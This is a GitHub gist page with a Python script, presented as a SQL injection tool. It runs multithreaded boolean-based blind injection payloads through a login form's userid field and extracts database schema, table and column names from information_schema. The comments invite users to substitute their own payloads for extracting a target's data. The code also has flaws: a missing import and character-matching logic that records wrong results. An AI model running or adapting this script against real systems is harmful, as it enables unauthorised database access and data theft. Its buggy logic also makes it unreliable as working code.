Created
May 29, 2019 06:35
-
-
Save suryadana/6d1711e8e82123b931e8d7c5fa5ec514 to your computer and use it in GitHub Desktop.
The part of tools scripting for sqlinjection, hell fire can burning anyting.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests, string, sys, threading | |
| url = 'http://example.com/any.php' | |
| def inline_print(value): | |
| value = str(value) | |
| sys.stdout.write("\b" * len(value)) | |
| sys.stdout.write(" " * len(value)) | |
| sys.stdout.write("\b" * len(value)) | |
| sys.stdout.write(value) | |
| sys.stdout.flush() | |
| def get_length(payload): | |
| for length_guess in range(1, 1000): | |
| params = { | |
| "userid": "-2547' OR length(({})) = {} -- XpQG".format(payload, length_guess), | |
| "password": "1" | |
| } | |
| res = requests.post(url, params, allow_redirects=False) | |
| if res.headers['Location'] == 'user': | |
| return length_guess | |
| break | |
| return 0 | |
| threadLimiter = threading.BoundedSemaphore(10) | |
| class RequestThread(threading.Thread): | |
| def __init__(self, payload, index, arr, *args, **kwargs): | |
| threading.Thread.__init__(self, *args, **kwargs) | |
| self.payload = payload | |
| self.index = index | |
| self.arr = arr | |
| def run(self): | |
| try: | |
| for item in string.ascii_letters + string.digits + "_\n:->< ": | |
| params = { | |
| "userid": "-2547' OR substring(({}), {}, 1) = '{}' -- XpQG".format(self.payload, self.index, item), | |
| "password": "1" | |
| } | |
| time.sleep(0.02) | |
| res = requests.post(url, params, allow_redirects=False) | |
| self.arr[self.index-1] = item | |
| if res.headers['Location'] == 'user': # Location redirection when success testing with payload 'or 1=1 -- | |
| self.arr[self.index-1] = item | |
| break | |
| finally: | |
| threadLimiter.release() | |
| sys.exit() | |
| def brute(payload, length_table): | |
| arr = ['_'] * length_table | |
| for i in range(1, length_table): | |
| threadLimiter.acquire() | |
| thread = RequestThread(payload, i, arr) | |
| thread.start() | |
| return "".join(arr) | |
| payload = """(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns) | |
| where (table_schema!='information_schema') and (table_schema=database()) and(0x00)in (@a:=concat(@a,':::',table_schema,' :: ',table_name,' -> ',column_name))))a) | |
| """ # Write your creation for extracting database your target | |
| print(brute(payload, 1000)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment